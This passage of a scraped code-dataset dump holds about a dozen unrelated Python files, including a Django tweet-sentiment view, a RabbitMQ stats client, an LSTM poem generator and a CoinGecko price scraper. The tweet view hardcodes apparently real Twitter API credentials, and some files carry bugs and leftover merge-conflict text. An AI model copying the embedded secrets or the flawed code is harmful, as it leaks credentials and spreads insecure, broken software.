Tkinter widgets.\n\n\tWill return the lowest common denominator variable for a value or list of\n\tvalues. For instance, if you have a list with both Strings and Integers,\n\tsimplegui cannot return an IntVar. If the user choose a String, there will\n\tbe an error.\n\n\tArgs:\n\t\t\tvalues (Mixed): The value(s) where you want the lowest common\n\t\t\tdenominator variable type.\n\n\tReturns:\n\t\t\tTkinter Variable\n\t\"\"\"\n\tif not isinstance(values, list):\n\t\tvalues = [values]\n\n\tvalueTypes = [type(value) for value in values]\n\n\tif str in valueTypes:\n\t\treturn StringVar()\n\telif float in valueTypes:\n\t\treturn DoubleVar()\n\telif int in valueTypes:\n\t\treturn IntVar()\n\telif bool in valueTypes:\n\t\treturn BooleanVar()\n\telse:\n\t\treturn StringVar()\n","sub_path":"simplegui/simplegui/common.py","file_name":"common.py","file_ext":"py","file_size_in_byte":849,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"549184175","text":"from django.shortcuts import render\n\n# Create your views here.\nfrom tweepy import API, OAuthHandler\n\nfrom textblob import TextBlob\n\nfrom django.http import HttpResponse\nfrom rest_framework.permissions import IsAuthenticated\nfrom rest_framework.decorators import api_view, permission_classes\n\nfrom rest_framework.response import Response\nfrom account.serializers import AccountSerializer\n\n\n# from API_KEYS import api_key, api_secret_key\n\ndef clean_tweets(tweet):\n tweet_words = str(tweet).split(' ')\n clean_words = [word for word in tweet_words if not word.startswith('#')]\n return ' '.join(clean_words)\n\n\ndef analyze(Topic):\n api_key = 'IToiFc5IxJa6Yg3raLFaXFSwg'\n\n api_secret_key = 'KqsUA65fTX48EArpnnwqvrH9n57IIbToYssfdUs9RFxRdjyUr6'\n\n positive_tweets, negative_tweets, all_tweets = [], [], []\n authentication = OAuthHandler(api_key, api_secret_key)\n api = API(authentication)\n public_tweets = api.search(Topic, count=1000)\n # add it\n all_tweets = [clean_tweets(tweet) for tweet in public_tweets] # clean_tweets(tweet.text)\n\n cleaned_tweets = [clean_tweets(tweet.text) for tweet in public_tweets] # clean_tweets(tweet.text)\n for tweet in cleaned_tweets:\n tweet_polarity = TextBlob(tweet).sentiment.polarity\n if tweet_polarity < 0:\n negative_tweets.append(tweet)\n continue\n positive_tweets.append(tweet)\n\n for tweet in negative_tweets:\n print(tweet)\n for tweet in positive_tweets:\n print(tweet)\n for tweet in all_tweets:\n print(tweet)\n\n return positive_tweets, negative_tweets, all_tweets\n\n\n# positive, negative = analyze('mohamed')\n# # print(positive , '\\n\\n', negative)\n# print(len(positive), ' VS ', len(negative))\n\n\n@api_view(['POST', ])\n@permission_classes([IsAuthenticated])\ndef get_tweets(request):\n topic = request.POST['topic']\n positive, negative, all_tweets = analyze(topic)\n data = {}\n\n data['negative_count'] = len(negative)\n data['positive_count'] = len(positive)\n data[\"positive\"] = positive\n data[\"negative\"] = negative\n data['all_tweets'] = all_tweets\n\n return Response(data)\n\n# @api_view(['GET', ])\n# @permission_classes([IsAuthenticated])\n# def search(request):\n# api_key = 'IToiFc5IxJa6Yg3raLFaXFSwg'\n#\n# api_secret_key = 'KqsUA65fTX48EArpnnwqvrH9n57IIbToYssfdUs9RFxRdjyUr6'\n#\n# authentication = OAuthHandler(api_key, api_secret_key)\n#\n# api = API(authentication)\n#\n# corona_tweets = api.search('corona virus')\n#\n# for tweet in corona_tweets:\n# text = tweet.text\n# print(text)\n# # return HttpResponse(text)\n# return Response(\"ok\")\n\n# search()\n","sub_path":"tweets/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2661,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"616581641","text":"from os import environ\n\nfrom contextlib import contextmanager\nfrom sqlalchemy import create_engine\nfrom sqlalchemy.orm import sessionmaker\n\nfrom models import Base\n\nDB_URL = environ.get(\"DATABASE_URL\", \"mysql+pymysql://db_user:db_password@db/db_name\")\nENGINE = create_engine(DB_URL)\n\n# The class to use for all sessions\nSession = sessionmaker(bind=ENGINE)\n\n\n@contextmanager\ndef scoped_session():\n \"\"\"Provide a transactional scope around a series of operations.\"\"\"\n session = Session()\n\n try:\n yield session\n session.commit()\n except:\n session.rollback()\n raise\n finally:\n session.expunge_all()\n session.close()\n\n\ndef init_db():\n \"\"\"Initialize DB schema\"\"\"\n Base.metadata.create_all(bind=ENGINE, checkfirst=True)\n\n\ndef teardown_db():\n \"\"\"Drop all tables in DB\"\"\"\n Base.metadata.drop_all(bind=ENGINE, checkfirst=True)\n","sub_path":"app/db.py","file_name":"db.py","file_ext":"py","file_size_in_byte":885,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"389715031","text":"p = int(input()) \na=0\nif p>=90:\n a=\"expert\"\nelif p<90 and p>=70:\n a=90-p\n \nelif p<70 and p>=40:\n a=70-p \nelse:\n a =40-p\nprint(a)\n\n\n","sub_path":"Biginer_Contest_219/a.py","file_name":"a.py","file_ext":"py","file_size_in_byte":149,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"261373229","text":"#!/usr/bin/python\n\nimport requests\n\n\nclass RabbitMQStats:\n\n def __init__(self, host, port, url, user, pwd, is_https=False):\n self.host = host\n self.port = port\n self.base_url = url\n self.username = user\n self.password = pwd\n self.scheme = 'https' if is_https else 'http'\n\n def get_overview(self):\n body = self._request('/overview')\n return body\n\n def get_nodes(self, memory=False, binary=False, health=False):\n nodes = self._request('/nodes')\n body = []\n for node in nodes:\n if memory or binary:\n node = self.get_node_details(node['name'], memory, binary)\n if health:\n node['health'] = self.get_node_health(node['name'])\n body.append(node)\n return body\n\n def get_node_details(self, node_name, memory=True, binary=False):\n body = self._request('/nodes/%s?memory=%s&binary=%s' % (node_name, str(memory).lower(), str(binary).lower()))\n return body\n\n def get_node_health(self, node_name):\n body = self._request('/healthchecks/node/%s' % (node_name))\n return body\n\n def get_queues(self):\n body = self._request('/queues')\n return body\n\n def get_queue_detailed(self, queue_name):\n return self._request('/queues/{0}/{1}'.format(self.username, queue_name))\n\n def get_listeners(self):\n overview = self.get_overview()\n listeners_by_node = {}\n for listener in overview['listeners']:\n if listener['node'] not in listeners_by_node:\n listeners_by_node[listener['node']] = []\n listeners_by_node[listener['node']].append(listener)\n return listeners_by_node\n\n def get_partitions(self):\n nodes = self.get_nodes()\n partitions = []\n for node in nodes:\n partitions.extend(node['partitions'])\n return partitions\n\n def get_applications(self):\n nodes = self.get_nodes()\n applications = {}\n for node in nodes:\n for application in node['applications']:\n applications[application['name']] = application\n return applications\n\n def _request(self, path):\n try:\n r = requests.get('{0}://{1}:{2}{3}{4}'.format(self.scheme, self.host, self.port, self.base_url, path),\n auth=(self.username, self.password))\n except Exception as e:\n print('_request: {0}'.format(e))\n return {}\n return r.json()\n","sub_path":"rabbitmq_stats/RabbitMQStats.py","file_name":"RabbitMQStats.py","file_ext":"py","file_size_in_byte":2527,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"246293865","text":"from __future__ import print_function\nimport numpy as np\nimport tensorflow as tf\nimport re\nimport language_check\n\nimport argparse\nimport os\nfrom six.moves import cPickle\n\nfrom model import Model\nimport sys\nimport datamuser\nimport random\nimport string\nimport metaphor as meta\n\nTAYLOR = False\ntry:\n if os.environ[\"COMPUTERNAME\"] == 'DALAILAMA':\n TAYLOR = True\nexcept:\n TAYLOR = False\n\n# Sterling's globals\nsave_dir = 'save'\n\nif TAYLOR:\n save_dir = r\"./save/MASTER\"\n #save_dir = r\"./save/FINAL\"\n\nTOP_TOPIC_WORDS = 10\nTOP_VOCAB_WORDS = 5000\nNUM_OF_SAMPLES = 10\n\nclass PoemWriter():\n\n def __init__(self, save_dir='save', n=20, prime = ' ', count = 1, end_word = \"turtle\", output_path = \"sample.txt\", internal_call = False, model = None, syllables = 10, pick = 1, use_topics = False, sample_type=1):\n\n if pick == 1:\n self.number_of_samples = NUM_OF_SAMPLES\n else:\n self.number_of_samples = 1\n\n parser = argparse.ArgumentParser()\n parser.add_argument('--save_dir', '-s', type=str, default=save_dir,\n help='model directory to load stored checkpointed models from')\n parser.add_argument('-n', type=int, default=n,\n help='number of words to sample')\n parser.add_argument('--prime', type=str, default=prime,\n help='prime text')\n parser.add_argument('--pick', type=int, default=1,\n help='1 = weighted pick, 2 = beam search pick')\n parser.add_argument('--width', type=int, default=5,\n help='width of the beam search')\n parser.add_argument('--sample', type=int, default=sample_type,\n help='0 to use max at each timestep, 1 to sample at each timestep, 2 to sample on spaces')\n parser.add_argument('--count', '-c', type=int, default=count,\n help='number of samples to print')\n parser.add_argument('--quiet', '-q', default=False, action='store_true',\n help='suppress printing the prime text (default false)')\n parser.add_argument('--end_word', '-e', default=end_word,\n help='Last word of line')\n parser.add_argument('--output_path', '-o', default=output_path,\n help='Last word of line')\n parser.add_argument('--syllables', '-y', default=syllables,\n help='Last word of line', type=int)\n parser.add_argument('--use_topics', '-t', default=use_topics,\n help='Use topic words', type=bool)\n\n self.args = parser.parse_args(\"\")\n\n path = os.path.join(self.args.save_dir, 'config.pkl')\n with open(path, 'rb') as f:\n saved_args = cPickle.load(f)\n saved_args.use_topics=self.args.use_topics\n\n main_path = os.path.join(self.args.save_dir, 'words_vocab.pkl')\n freq_path = os.path.join(self.args.save_dir, 'words_vocab_freq.pkl')\n\n self.words_freq, self.vocab_freq = self.open_pickle(freq_path)\n self.words, self.vocab = self.open_pickle(main_path)\n\n self.model = Model(saved_args, True)\n self.freq_words = set(self.words_freq[0:TOP_VOCAB_WORDS ])\n\n def open_pickle(self, path):\n with open(path, 'rb') as f:\n if sys.version_info[0] >= 3:\n words, vocab = cPickle.load(f, encoding='latin-1')\n else:\n words, vocab = cPickle.load(f)\n return words, vocab\n\n\n def evaluate_line(self, line):\n return True # for now\n\n def strip_punc(self, s):\n table = str.maketrans({key: None for key in string.punctuation})\n new_s = s.translate(table) # Output: string without punctuation\n return new_s\n\n def cap(self, match):\n return match.group().upper()\n\n def clean_poem(self, poem_list):\n print(\"cleaning poem\")\n for i, l in enumerate(poem_list):\n l = l.strip()\n l = l.replace(\"- \", \"-\")\n l = l.replace(\" i \", \" I \")\n l = l[0].upper() + l[1:]\n l = re.sub(\"(\\. [a-z])\", self.cap, l)\n poem_list[i] = l\n return poem_list\n\n def correct_grammar(self, poem):\n tool = language_check.LanguageTool('en-US')\n matches = tool.check(poem)\n for i in matches:\n print(matches[i])\n new_poem = language_check.correct(poem, matches)\n return new_poem\n\n def write_out_poem(self, poem, path=None):\n output_path = self.args.output_path\n if not output_path is None:\n if not os.path.isdir(output_path):\n output_path = os.path.join(self.args.save_dir, output_path)\n with open(output_path, \"a\") as f:\n f.write('\\n\\n')\n # for item in text_list:\n # f.write(item)\n f.write(poem)\n\n def sample(self, num_syllables, num_lines, topic_word, custom_rhyme = [], related_words=[], metaphor = \"\"):\n\n with tf.Session() as sess:\n tf.global_variables_initializer().run()\n saver = tf.train.Saver(tf.global_variables())\n ckpt = tf.train.get_checkpoint_state(self.args.save_dir)\n text_list = []\n\n if ckpt and ckpt.model_checkpoint_path:\n saver.restore(sess, ckpt.model_checkpoint_path)\n continuous = True\n while continuous:\n print(\"Syllables: {}\".format(num_syllables))\n print(\"Topic: {}\".format(topic_word))\n print(\"Custom Rhyme: {}\".format(custom_rhyme))\n print(\"Related Words: {}\".format(related_words))\n print(\"Metaphor: {}\".format(metaphor))\n print(\"Prime: {}\".format(self.args.prime))\n if topic_word == \"\":\n related_words = [\"\\n\"]\n else:\n related_words_muse = datamuser.get_all_related_words(topic_word.split(), TOP_TOPIC_WORDS)\n # Get related words\n if metaphor != \"\":\n related_words = meta.main(metaphor, 10, False) + related_words_muse\n elif related_words == []:\n related_words = related_words_muse\n\n if type(related_words) == type([]):\n related_words = set(related_words)\n print(related_words)\n topic_words = list(related_words.intersection(self.freq_words))\n if len(topic_words) == 0:\n raise ValueError(\"No vocab words related to topic\")\n print (topic_words)\n\n # Do priming\n prime = \"\"\n if self.args.prime == \"\":\n if metaphor != \"\":\n prime = metaphor\n else:\n for ii in range(0, int(num_syllables/2)):\n prime += random.choice(topic_words) + \" \"\n else:\n prime = self.args.prime\n\n if prime[-1] != \"\\n\":\n prime += \".\\n\"\n\n \"\"\"print(\"Pre-prime: {}\".format(prime))\n # make sure prime words are valid\n p = prime.lower()\n p = p.replace(\"\\n\", \"|\")\n p = [x for x in p.split() if x in self.words]\n prime = \" \".join(p).replace(\"|\", \"\\n\")\"\"\"\n\n # prime = '{} {} {}\\n'.format(topic_word, topic_word, topic_word)\n quiet = True\n poem_lines = []\n print(\"Prime {}\".format(prime))\n i = 0\n while i < num_lines:\n # get endword\n if metaphor != \"\":\n pass\n #all_words = meta.main(metaphor, 1000, True)\n #all_words = meta.main(metaphor, 10, True)\n #datamuser.find_rhyming_pairs(all_words)\n #print(all_words)\n if i % 2 == 0 and custom_rhyme == []:\n # pick random topic word\n end_word = random.choice(topic_words)\n #end_word = \"\\n\"\n else:\n # rhyme with last line\n if custom_rhyme != []:\n last_word = custom_rhyme[i % len(custom_rhyme)]\n\n # don't try to rhyme if doing a metaphor\n if metaphor == \"\" or True:\n rhymes = list(datamuser.get_rhymes(last_word, weak_rhymes=False).intersection(self.freq_words))\n else: # don't get rhymes, just topic words\n rhymes = list(related_words_muse.intersection(self.freq_words))\n\n # print (len(rhymes))\n if len(rhymes)==0: end_word = \"\\n\" #random.choice(topic_words)\n else: end_word = random.choice(rhymes)\n # print('LAST WORD: {} END WORD: {}'.format(last_word, end_word))\n\n temp_topic_word = random.choice(topic_words)\n print(\"Topic influencer {}\".format(temp_topic_word))\n # print ('END WORD: {}'.format(end_word))\n # end_word = 'flag'\n\n candidate_lines = []\n scores = []\n self.args.sample = 1\n print (\"GENERATING A NEW LINE -- SAMPLING SOME CANDIDATES -- END WORD {}\".format(end_word))\n for j in range(self.number_of_samples): # get best of 10 lines\n line, score = self.model.sample(sess, self.words, self.vocab, self.args.n,\n prime, self.args.sample, self.args.pick,\n self.args.width, quiet, end_word, num_syllables, True, topic_word=temp_topic_word)\n # quiet = True\n # line = lines[len(prime):].split('\\n')[0] # strip off prime and keep next single line\n candidate_lines.append(line)\n scores.append(score)\n # print (\"LINE: {} SCORE: {}\".format(lines, score))\n\n print(scores)\n print(np.argmax(scores))\n if scores[np.argmax(scores)] == -40:\n print(candidate_lines)\n continue\n\n line = candidate_lines[np.argmax(scores)]\n # if len(line) < 15:\n # # bad line, too short\n # i -= 1\n # continue\n count = lambda l1, l2: len(list(filter(lambda c: c in l2, l1)))\n if count(line, string.punctuation) > 6:\n # bad line, too much punctuation\n continue\n\n last_word = self.strip_punc(line.split()[-1])\n\n\n try:\n if not last_word.isalpha(): last_word = line.split()[-2]\n except IndexError:\n continue\n\n if not last_word.isalpha():\n # bad line, ends in multiple punctuations\n continue\n\n #for ii, l in enumerate(candidate_lines):\n # print(l, scores[ii])\n\n print(\"CHOSEN LINE::: {}\".format(line), score)\n if end_word == \"\\n\":\n end_word = r\"\\n\"\n tag = \" ({} -> {}) \".format(temp_topic_word, end_word)\n poem_lines.append(line + tag)\n prime += (line + '\\n')\n\n i += 1\n\n #poem = prime[len(orig_prime):]\n poem_lines = self.clean_poem(poem_lines)\n poem = \"\\n\".join(poem_lines)\n #poem = self.correct_grammar(poem)\n print (\"\\n\\nLINES WRITTEN BY GRAMPS\\n{}\".format(poem))\n self.write_out_poem(poem)\n\n if True:\n topic_word = input(\"Topic?\")\n new_prime = input(\"Prime?\")\n metaphor = input(\"Metaphor?\")\n related_words = [] # reset this\n if new_prime == \"same\":\n pass\n else:\n self.args.prime = new_prime\n\n #continuous = False\n\n def write_poems(self, topics, n, filename):\n\n syllables = 8\n lines = 4\n\n outfile = open(filename, 'a')\n for topic in topics:\n outfile.write('TOPIC: {}\\n'.format(topic.upper()))\n for i in range(n):\n poem = self.sample(syllables, lines, topic)\n outfile.write('Poem {}. \\n{}\\n'.format(i, poem))\n\n\n outfile.close()\n\n\ndef copy_a_poem():\n PRIME = \"\"\"Two roads diverged in a yellow wood,\n And sorry I could not travel both\n And be one traveler, long I stood\n And looked down one as far as I could\n To where it bent in the undergrowth;\n\n Then took the other, as just as fair,\n And having perhaps the better claim,\n Because it was grassy and wanted wear;\n Though as for that the passing there\n Had worn them really about the same,\n\n And both that morning equally lay\n In leaves no step had trodden black.\n Oh, I kept the first for another day!\n Yet knowing how way leads on to way,\n I doubted if I should ever come back.\n\n I shall be telling this with a sigh\n Somewhere ages and ages hence:\n Two roads diverged in a wood, and I\"\"\"\n RHYME = [\"sigh\", \"hence\"]\n RELATED_WORDS = []\n METAPHOR = \"\"\n args.n_syllables = 9\n args.topic = \"\"\n pw = PoemWriter(save_dir=save_dir, prime=PRIME, pick=1)\n pw.sample(args.n_syllables, args.n_lines, args.topic, custom_rhyme=RHYME, related_words=RELATED_WORDS,\n metaphor=METAPHOR)\n\n\ndef generate_new_poem(args):\n PRIME = \"creamy milky kurds and feta cheese,\\n\"\n PRIME = \"\"\n args.topic = \"road\"\n\n RHYME = []\n args.topic = \"cheese\"\n PRIME = args.topic\n RELATED_WORDS = [\"creamey\", \"cheesy\", \"milk\", \"gooey\", \"cheddar\", \"feta\", \"culture\", \"cheese\", \"mold\", \"food\", \"delicious\", \"flavour\"]\n RELATED_WORDS = [\"cheese\", \"food\", \"delicious\", \"flavour\"]\n RELATED_WORDS = []\n\n METAPHOR = r\"marriage as death\"\n METAPHOR = r\"student as beggar\"\n #METAPHOR = r\"child as tempest\"\n args.topic = \"student\"\n PRIME=\"\"\n\n pw = PoemWriter(save_dir=save_dir, prime=PRIME, pick=1)\n pw.sample(args.n_syllables, args.n_lines, args.topic, custom_rhyme=RHYME, related_words=RELATED_WORDS, metaphor=METAPHOR)\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser()\n parser.add_argument('--topic', '-t', type=str, default='cheese',\n help='topic word for poem')\n parser.add_argument('--n_lines', '-l', type=int, default=4,\n help='number of lines to generate')\n parser.add_argument('--n_syllables', '-s', type=int, default=8 ,\n help='number of syllables per line')\n\n args = parser.parse_args()\n generate_new_poem(args)\n #copy_a_poem()\n if False:\n pw = PoemWriter(save_dir = save_dir, prime= PRIME, pick=1)\n pw.sample(args.n_syllables, args.n_lines, args.topic, custom_rhyme=RHYME, related_words=RELATED_WORDS, metaphor=METAPHOR)\n\n\"\"\"Do not go gentle into that good night,\nOld age should burn and rave at close of day;\nRage, rage against the dying of the light.\n\nThough wise men at their end know dark is right,\nBecause their words had forked no lightning they\nDo not go gentle into that good night.\n\nGood men, the last wave by, crying how bright\nTheir frail deeds might have danced in a green bay,\nRage, rage against the dying of the light.\n\nWild men who caught and sang the sun in flight,\nAnd learn, too late, they grieved it on its way,\nDo not go gentle into that good night.\n\nGrave men, near death, who see with blinding sight\nBlind eyes could blaze like meteors and be gay,\nRage, rage against the dying of the light.\n\nAnd you, my father, there on the sad height,\nCurse, bless, me now with your fierce tears, I pray.\nDo not go gentle into that good night.\n\"\"\"\n\n\n\"\"\"=======\n pw = PoemWriter(sample_type=0)\n # pw.sample(args.n_syllables, args.n_lines, args.topic)\n\n# topics = ['cheese',\n# 'furniture',\n# 'animals',\n# 'bear',\n# 'basketball',\n# 'soccer',\n# 'woman',\n# 'man',\n# 'map',\n# 'anger',\n# 'rejoice',\n# 'sandwich',\n# 'history',\n# 'convertibles',\n# 'flower',\n# 'dirt',\n# 'friendship',\n# 'poetry',\n# 'hardship',\n# 'heaven', # 20 => 1.5 hours\n# ]\n topics = [\n # 'night',\n # 'virtue',\n # 'Rome',\n 'sky',\n 'creativity',\n 'desert',\n 'challenge',\n 'darkness',\n 'light',\n 'jupiter',\n 'taxes',\n 'immigration',\n 'ocean',\n 'pirate',\n 'darwin',\n 'texas',\n 'beauty',\n 'knight',\n 'marriage',\n 'magic' # 40 => 4 hours?\n ]\n\n N = 5\n pw.write_poems(topics, N, 'outputs/volume3.txt')\n>>>>>>> 814b49a8ba62f3de50b7c1972b7ad33dcdb2ab76\n\"\"\"","sub_path":"poem_writer.py","file_name":"poem_writer.py","file_ext":"py","file_size_in_byte":18233,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"571638864","text":"# coding=utf-8\n# Copyright 2022 The Google Research Authors.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\n\"\"\"Data loader for FMoW dataset.\"\"\"\n\nfrom gift.data import base_dataset\nfrom gift.data.builders import fmow_builder\n\n\nclass Fmow(base_dataset.MutliEnvironmentImageDataset):\n \"\"\"Data loader for FMoW.\"\"\"\n\n _ALL_ENVIRONMENTS = ['train', 'val_id', 'val_ood', 'test_id', 'test_ood']\n\n @property\n def name(self):\n return 'fmow'\n\n def get_builder(self, name):\n return fmow_builder.Fmow(data_dir='PATH_TO_DATA')\n\n def set_static_dataset_configs(self):\n self._channels = 3\n train_splits = {}\n for env in self.train_environments:\n train_splits[env] = f'{env}'\n\n test_splits = {}\n valid_splits = {}\n for env in self.eval_environments:\n valid_splits[env] = f'{env}'\n test_splits[env] = f'{env}'\n\n self._splits_dict = {\n 'train': train_splits,\n 'test': test_splits,\n 'validation': valid_splits\n }\n self._crop_padding = 32\n self._mean_rgb = [0.485, 0.456, 0.406]\n self._stddev_rgb = [0.229, 0.224, 0.225]\n self.resolution = self.resolution or 224\n self.resize_mode = 'resize'\n self.data_augmentations = self.data_augmentations or ['center_crop']\n self.teacher_data_augmentations = self.teacher_data_augmentations or [\n 'center_crop'\n ]\n self.eval_augmentations = ['center_crop']\n self.if_cache = True\n\n def get_tfds_env_name(self, name):\n return name\n\n def get_tfds_ds_and_info(self, name, data_range):\n del name\n ds = self.builder.as_dataset(split=data_range)\n\n return ds, self.builder.info\n\n def get_num_classes(self):\n return self.builder.info.features['label'].num_classes\n","sub_path":"gift/data/fmow.py","file_name":"fmow.py","file_ext":"py","file_size_in_byte":2198,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"486648817","text":"from io import StringIO\nfrom PIL import Image\nimport urllib.request, urllib.parse, urllib.error\nimport json\n\ndef getMap(google_key, search, width=150, height=100, zoom=4):\n try:\n url = \"https://maps.googleapis.com/maps/api/geocode/json?key=\" + google_key + \"&address=\" + search\n geo = json.loads(urllib.request.urlopen(url).read())\n ne = geo[\"results\"][0][\"geometry\"][\"bounds\"][\"northeast\"]\n sw = geo[\"results\"][0][\"geometry\"][\"bounds\"][\"southwest\"]\n lat = ( ne[\"lat\"] + sw[\"lat\"] ) / 2\n lng = ( ne[\"lng\"] + sw[\"lng\"] ) / 2\n height = height + 30\n url = \"http://maps.googleapis.com/maps/api/staticmap?key=\" + google_key + \"¢er=\"+ str(lat-0.5) + \",\" + str(lng) +\"&size=\"+str(width)+\"x\"+str(height)+\"&zoom=\"+str(zoom)+\"&sensor=false\"\n buffer = StringIO(urllib.request.urlopen(url).read())\n image = Image.open(buffer)\n image = image.crop((0,0,image.size[0],image.size[1]-30))\n return image\n except:\n return None","sub_path":"static/py/googleMaps.py","file_name":"googleMaps.py","file_ext":"py","file_size_in_byte":1008,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"553556068","text":"from PyQt4 import QtCore, QtGui\r\nfrom VideoCapture import Device\r\nfrom PIL import Image, ImageQt\r\nimport sys\r\nimport time\r\n\r\napp = QtGui.QApplication(sys.argv)\r\nwindow = QtGui.QWidget()\r\nlayout = QtGui.QGridLayout(window)\r\n\r\nbutton = QtGui.QLabel()\r\n\r\n\r\ncam = Device(0)\r\n\r\npilImage = cam.getImage()\r\nqimg = ImageQt.ImageQt(pilImage)\r\nqPixmap = QtGui.QPixmap.fromImage(qimg)\r\nbutton.setPixmap(qPixmap)\r\ntime.sleep(10)\r\ndel(cam)\r\n\r\n\r\nlayout.addWidget(button)\r\n\r\nwindow.show()\r\napp.exec_()\r\n","sub_path":"Program za tablo/OratorijPyQt/testz/webcam.py","file_name":"webcam.py","file_ext":"py","file_size_in_byte":488,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"115578791","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Sun Nov 24 21:43:46 2019\r\n\r\n@author: 國倫\r\n\"\"\"\r\n\r\n\r\nwhile True:\r\n try:\r\n# 紀錄輸入的身高cm 轉換為m 並且**2 平方\r\n height = (float(input('請輸入身高(cm):')) / 100)**2\r\n# 紀錄輸入的體重kg\r\n weight = float(input('請輸入體重(kg):'))\r\n# bmi 計算 體重除以身高\r\n bmi = weight / height\r\n# 4捨5入至小數第一位\r\n print(round(bmi,1 ) )\r\n action = input('按下enter重新輸入或輸入N結束:')\r\n if action == 'N':\r\n break\r\n except:\r\n print('請輸入數字')\r\n\r\n\r\n","sub_path":"KUO_LUN/write/30 python/try_except.py","file_name":"try_except.py","file_ext":"py","file_size_in_byte":639,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"223266981","text":"import datetime\nimport time\n\n\nfrom requests import Session\n\n\nfrom .models import Coins, Exchange\n\nheaders = {\n 'Accepts': 'application/json'\n\n}\n\nsession = Session()\nsession.headers.update(headers)\ndelay = 4500\n\n\ndef save_exchange(pk):\n\n \"\"\" save in database data exchange\"\"\"\n\n url = f'https://api.coingecko.com/api/v3/exchanges/{pk}'\n data = session.get(url)\n response_data = data.json()\n name = response_data['name'].lower()\n image = response_data['image']\n slug = response_data['name']\n trade_url = response_data['url']\n exchange = Exchange(\n name=name,\n image=image,\n slug=slug,\n trade_url=trade_url\n )\n exchange.save()\n print('сохранено-', exchange.name)\n return exchange\n\n\ndef get_exchange(pk):\n\n \"\"\"\n get exchange data for name exchange\n \"\"\"\n\n url = f'https://api.coingecko.com/api/v3/exchanges/{pk}'\n data = session.get(url)\n print(data, pk)\n echange_db = Exchange.objects.filter(name=pk).first()\n if echange_db:\n return\n else:\n try:\n return save_exchange(pk)\n except:\n print('none')\n\n\ndef get_exchanges_list():\n\n \"\"\"\n get names list coins all \n \"\"\"\n \n counter = 0\n url = 'https://api.coingecko.com/api/v3/exchanges/list'\n response_exchanges = session.get(url)\n data = response_exchanges.json()\n for exchange in data:\n counter = counter+1\n exchange_pk = exchange['id']\n print(counter)\n time.sleep(2)\n get_exchange(exchange_pk)\n\n\ndef get_chart_data(id):\n\n \"\"\"\n history data (price 7d) for coin name\n \"\"\"\n\n list_price_7d = {}\n days = 7\n today_date = datetime.date.today() - datetime.timedelta(days=days)\n\n while days >= 1:\n url_price_7d = f'''\n https://api.coingecko.com/api/v3/coins/{id}/history?date={today_date.strftime(\"%d-%m-%Y\")}\n '''\n response_price_7d = session.get(url_price_7d)\n data_price = response_price_7d.json()\n data_price_today = data_price['market_data']['current_price']['usd']\n today_date = datetime.date.today() - datetime.timedelta(days=days-1)\n list_price_7d[str(days)] = data_price_today\n days = days - 1\n return list_price_7d\n\n\ndef update_price_coin(coin_symbol):\n\n \"\"\"\n request for name_coin data\n \"\"\"\n\n name_coin = coin_symbol.lower()\n url = f'https://api.coingecko.com/api/v3/coins/{name_coin}/'\n response = session.get(url)\n data = response.json()\n price_7d = get_chart_data(coin_symbol)\n price = data['market_data']['current_price']['usd']\n market_cap = data['market_data']['market_cap']['usd']\n volume = int(data['market_data']['total_volume']['usd'])\n image = str(data['image']['small'])\n price_exc = int(data['market_data']['price_change_percentage_24h'])\n\n return price, market_cap, volume, image, price_exc, price_7d\n\n\ndef get_update_price_coins():\n \"\"\"\n update data for coins\n \"\"\"\n\n for coin in Coins.objects.all():\n print(coin)\n time.sleep(5)\n try:\n (\n coin.price,\n coin.market_cap,\n coin.volume,\n coin.image,\n coin.price_exc,\n coin.board_price\n ) = update_price_coin(coin.name)\n coin.save()\n except:\n print('except')\n\n\ndef add_market_for_coin(market_id, coin):\n\n \"\"\"\n add many to many Exchange for coin\n \"\"\"\n\n exchange = Exchange.objects.filter(name=market_id).first()\n print(exchange, market_id)\n if not exchange:\n try:\n new_exchange = save_exchange(market_id)\n coin.market_exchange.add(new_exchange)\n except:\n print('error')\n else:\n print('add')\n coin.market_exchange.add(exchange)\n\n\ndef get_market_coins(coins):\n\n \"\"\"\n get markets for coin id\n \"\"\"\n\n for coin in coins:\n url = f'https://api.coingecko.com/api/v3/coins/{coin}/tickers'\n response = session.get(url)\n data = response.json()\n for market in data['tickers']:\n print(coin)\n market_name = market['market']['identifier']\n time.sleep(2)\n add_market_for_coin(market_name.lower(), coin)\n","sub_path":"apps/coins/service.py","file_name":"service.py","file_ext":"py","file_size_in_byte":4296,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"390584646","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Aug 11 10:38:39 2020\n\n@author: vb18255\n\"\"\"\n\n\nfrom sklearn.datasets import load_iris\niris = load_iris()\nX = iris.data\ny = iris.target\n# =============================================================================\n# feature_names = iris.feature_names\n# target_names = iris.target_names\n# print(\"Feature names:\", feature_names)\n# print(\"Target names:\", target_names)\n# print(\"\\nFirst 10 rows of X:\\n\", X[:10])\n# print('=================')\n# print(X)\n# =============================================================================\nfrom sklearn.model_selection import train_test_split\nX_train, X_test, y_train, y_test = train_test_split(X, y, test_size = 